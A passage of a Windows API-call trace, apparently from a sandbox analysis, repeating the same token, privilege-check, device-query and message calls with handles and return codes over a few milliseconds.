DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.969] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.969] SetLastError (dwErrCode=0x522) [0016.969] CloseHandle (hObject=0x114) returned 1 [0016.969] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.969] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.969] GetLastError () returned 0x578 [0016.969] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.969] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.969] GetCurrentThread () returned 0xfffffffe [0016.969] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.969] GetLastError () returned 0x3f0 [0016.969] GetCurrentProcess () returned 0xffffffff [0016.969] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.969] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.969] SetLastError (dwErrCode=0x522) [0016.969] CloseHandle (hObject=0x114) returned 1 [0016.969] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.969] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.969] GetLastError () returned 0x578 [0016.969] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.969] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.969] GetCurrentThread () returned 0xfffffffe [0016.969] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.969] GetLastError () returned 0x3f0 [0016.969] GetCurrentProcess () returned 0xffffffff [0016.969] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.969] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.969] SetLastError (dwErrCode=0x522) [0016.969] CloseHandle (hObject=0x114) returned 1 [0016.969] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.969] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.969] GetLastError () returned 0x578 [0016.969] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.969] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.969] GetCurrentThread () returned 0xfffffffe [0016.969] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.969] GetLastError () returned 0x3f0 [0016.969] GetCurrentProcess () returned 0xffffffff [0016.969] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.970] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.970] SetLastError (dwErrCode=0x522) [0016.970] CloseHandle (hObject=0x114) returned 1 [0016.970] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.970] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.970] GetLastError () returned 0x578 [0016.970] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.970] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.970] GetCurrentThread () returned 0xfffffffe [0016.970] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.970] GetLastError () returned 0x3f0 [0016.970] GetCurrentProcess () returned 0xffffffff [0016.970] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.970] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.970] SetLastError (dwErrCode=0x522) [0016.970] CloseHandle (hObject=0x114) returned 1 [0016.970] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.970] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.970] GetLastError () returned 0x578 [0016.970] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.970] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.970] GetCurrentThread () returned 0xfffffffe [0016.970] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.970] GetLastError () returned 0x3f0 [0016.970] GetCurrentProcess () returned 0xffffffff [0016.970] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.970] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.970] SetLastError (dwErrCode=0x522) [0016.970] CloseHandle (hObject=0x114) returned 1 [0016.970] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.970] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.970] GetLastError () returned 0x578 [0016.970] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.970] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.970] GetCurrentThread () returned 0xfffffffe [0016.970] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.970] GetLastError () returned 0x3f0 [0016.970] GetCurrentProcess () returned 0xffffffff [0016.970] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.970] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.970] SetLastError (dwErrCode=0x522) [0016.970] CloseHandle (hObject=0x114) returned 1 [0016.970] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.970] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.971] GetLastError () returned 0x578 [0016.971] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.971] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.971] GetCurrentThread () returned 0xfffffffe [0016.971] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.971] GetLastError () returned 0x3f0 [0016.971] GetCurrentProcess () returned 0xffffffff [0016.971] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.971] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.971] SetLastError (dwErrCode=0x522) [0016.971] CloseHandle (hObject=0x114) returned 1 [0016.971] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.971] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.971] GetLastError () returned 0x578 [0016.971] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.971] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.971] GetCurrentThread () returned 0xfffffffe [0016.971] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.971] GetLastError () returned 0x3f0 [0016.971] GetCurrentProcess () returned 0xffffffff [0016.971] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.971] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.971] SetLastError (dwErrCode=0x522) [0016.971] CloseHandle (hObject=0x114) returned 1 [0016.971] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.971] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.971] GetLastError () returned 0x578 [0016.971] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.971] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.971] GetCurrentThread () returned 0xfffffffe [0016.971] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.971] GetLastError () returned 0x3f0 [0016.971] GetCurrentProcess () returned 0xffffffff [0016.971] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.971] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.971] SetLastError (dwErrCode=0x522) [0016.971] CloseHandle (hObject=0x114) returned 1 [0016.971] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.971] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.971] GetLastError () returned 0x578 [0016.971] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.971] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.971] GetCurrentThread () returned 0xfffffffe [0016.972] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.972] GetLastError () returned 0x3f0 [0016.972] GetCurrentProcess () returned 0xffffffff [0016.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.972] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.972] SetLastError (dwErrCode=0x522) [0016.972] CloseHandle (hObject=0x114) returned 1 [0016.972] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.972] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.972] GetLastError () returned 0x578 [0016.972] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.972] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.972] GetCurrentThread () returned 0xfffffffe [0016.972] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.972] GetLastError () returned 0x3f0 [0016.972] GetCurrentProcess () returned 0xffffffff [0016.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.972] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.972] SetLastError (dwErrCode=0x522) [0016.972] CloseHandle (hObject=0x114) returned 1 [0016.972] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.972] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.972] GetLastError () returned 0x578 [0016.972] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.972] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.972] GetCurrentThread () returned 0xfffffffe [0016.972] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.972] GetLastError () returned 0x3f0 [0016.972] GetCurrentProcess () returned 0xffffffff [0016.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.972] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.972] SetLastError (dwErrCode=0x522) [0016.972] CloseHandle (hObject=0x114) returned 1 [0016.972] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.972] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.972] GetLastError () returned 0x578 [0016.972] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.972] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.972] GetCurrentThread () returned 0xfffffffe [0016.972] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.972] GetLastError () returned 0x3f0 [0016.972] GetCurrentProcess () returned 0xffffffff [0016.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.972] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.973] SetLastError (dwErrCode=0x522) [0016.973] CloseHandle (hObject=0x114) returned 1 [0016.973] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.973] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.973] GetLastError () returned 0x578 [0016.973] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.973] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.973] GetCurrentThread () returned 0xfffffffe [0016.973] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.973] GetLastError () returned 0x3f0 [0016.973] GetCurrentProcess () returned 0xffffffff [0016.973] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.973] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.973] SetLastError (dwErrCode=0x522) [0016.973] CloseHandle (hObject=0x114) returned 1 [0016.973] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.973] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.973] GetLastError () returned 0x578 [0016.973] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.973] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.973] GetCurrentThread () returned 0xfffffffe [0016.973] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.973] GetLastError () returned 0x3f0 [0016.973] GetCurrentProcess () returned 0xffffffff [0016.973] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.973] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.973] SetLastError (dwErrCode=0x522) [0016.973] CloseHandle (hObject=0x114) returned 1 [0016.973] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.973] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.973] GetLastError () returned 0x578 [0016.973] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.973] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.973] GetCurrentThread () returned 0xfffffffe [0016.973] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.973] GetLastError () returned 0x3f0 [0016.973] GetCurrentProcess () returned 0xffffffff [0016.973] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.973] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.973] SetLastError (dwErrCode=0x522) [0016.973] CloseHandle (hObject=0x114) returned 1 [0016.973] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.974] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.974] GetLastError () returned 0x578 [0016.974] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.974] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.974] GetCurrentThread () returned 0xfffffffe [0016.974] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.974] GetLastError () returned 0x3f0 [0016.974] GetCurrentProcess () returned 0xffffffff [0016.974] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.974] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.974] SetLastError (dwErrCode=0x522) [0016.974] CloseHandle (hObject=0x114) returned 1 [0016.974] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.974] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.974] GetLastError () returned 0x578 [0016.974] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.974] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.974] GetCurrentThread () returned 0xfffffffe [0016.974] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.974] GetLastError () returned 0x3f0 [0016.974] GetCurrentProcess () returned 0xffffffff [0016.974] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.974] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.974] SetLastError (dwErrCode=0x522) [0016.974] CloseHandle (hObject=0x114) returned 1 [0016.974] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.974] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.974] GetLastError () returned 0x578 [0016.974] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.974] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.974] GetCurrentThread () returned 0xfffffffe [0016.974] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.974] GetLastError () returned 0x3f0 [0016.974] GetCurrentProcess () returned 0xffffffff [0016.974] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.974] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.974] SetLastError (dwErrCode=0x522) [0016.974] CloseHandle (hObject=0x114) returned 1 [0016.974] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.974] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.974] GetLastError () returned 0x578 [0016.974] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.974] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.974] GetCurrentThread () returned 0xfffffffe [0016.975] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.975] GetLastError () returned 0x3f0 [0016.975] GetCurrentProcess () returned 0xffffffff [0016.975] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.975] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.975] SetLastError (dwErrCode=0x522) [0016.975] CloseHandle (hObject=0x114) returned 1 [0016.975] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.975] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.975] GetLastError () returned 0x578 [0016.975] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.975] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.975] GetCurrentThread () returned 0xfffffffe [0016.975] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.975] GetLastError () returned 0x3f0 [0016.975] GetCurrentProcess () returned 0xffffffff [0016.975] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.975] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.975] SetLastError (dwErrCode=0x522) [0016.975] CloseHandle (hObject=0x114) returned 1 [0016.975] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.975] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.975] GetLastError () returned 0x578 [0016.975] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.975] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.975] GetCurrentThread () returned 0xfffffffe [0016.975] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.975] GetLastError () returned 0x3f0 [0016.975] GetCurrentProcess () returned 0xffffffff 